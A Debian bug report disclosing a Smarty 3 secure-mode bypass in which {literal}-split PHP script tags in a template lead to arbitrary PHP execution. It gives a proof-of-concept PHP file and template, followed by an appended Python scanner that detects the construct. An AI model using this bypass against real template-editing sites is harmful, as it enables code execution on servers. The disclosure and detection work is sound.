Package: smarty3
Version: All below 3.1.21
Severity: important

Smarty secure mode should allow untrusted users to write templates,
without allowing them to execute arbitrary PHP code. However, all
smarty3 versions in Debian (sid, Jessie, stable, oldstable) currently
have a security hole allowing arbitrary PHP code execution if you can
edit templates.

Example:

test.php:
<?php
require_once('/home/thue/smarty/libs/SmartyBC.class.php');
$smarty = new Smarty();

$smarty->setTemplateDir('templates/');
$smarty->setCompileDir('templates_c/');
$smarty->enableSecurity();
$smarty->force_compile = true;
$tpl = $smarty->createTemplate('test.tpl');
$tpl->compileTemplateSource();
$smarty->display('test.tpl');
?>

templates/test.tpl:
{literal}<{/literal}script language=php>echo 1+1;</script>

If secure mode worked, that should output
   <script language=php>echo 1+1;</script>
In smarty3<3.1.21 it outputs
   2   

Regards, Thue

-- System Information:
Debian Release: 7.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
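
For anyone reviewing user-editable templates on an affected version, one way to flag the construct from the report is sketched below, as an added example that is not part of the original report or of Smarty. It removes {literal}/{/literal} tags before matching, since in the report they split the tag in the template source while the rendered result still executes it; the function names and sample templates are constructed here, and stripping {* *} comments as well is a conservative assumption.

```python
import re
from pathlib import Path

# Tags that emit no text of their own, so the text around them ends up
# adjacent in the compiled template. Comment handling is an assumption.
LITERAL_TAG = re.compile(r"\{/?literal\}")
SMARTY_COMMENT = re.compile(r"\{\*.*?\*\}", re.S)
# <script language=php>, with optional quotes and other attributes.
PHP_SCRIPT = re.compile(r"<script\b[^>]*\blanguage\s*=\s*[\"']?php\b", re.I)


def flatten(source):
    """Drop the tags above, keeping newlines so line numbers still match."""
    source = SMARTY_COMMENT.sub(lambda m: "\n" * m.group(0).count("\n"), source)
    return LITERAL_TAG.sub("", source)


def find_php_script_tags(source):
    """Return (line_number, original_line) for each PHP script tag found."""
    flat = flatten(source)
    lines = source.splitlines()
    hits = []
    for m in PHP_SCRIPT.finditer(flat):
        lineno = flat.count("\n", 0, m.start()) + 1
        hits.append((lineno, lines[lineno - 1].strip()))
    return hits


def scan_dir(template_dir):
    """Scan every *.tpl file below template_dir; return {path: hits}."""
    report = {}
    for path in sorted(Path(template_dir).rglob("*.tpl")):
        hits = find_php_script_tags(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# Constructed samples: the template from the report and a harmless one.
REPORTED = "{literal}<{/literal}script language=php>echo 1+1;</script>"
BENIGN = '<script type="text/javascript">var a = 1 + 1;</script>'

if __name__ == "__main__":
    print(find_php_script_tags(REPORTED))
    print(find_php_script_tags(BENIGN))
```

A hit is a reason to review the template by hand; a clean scan does not show that a template is safe.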

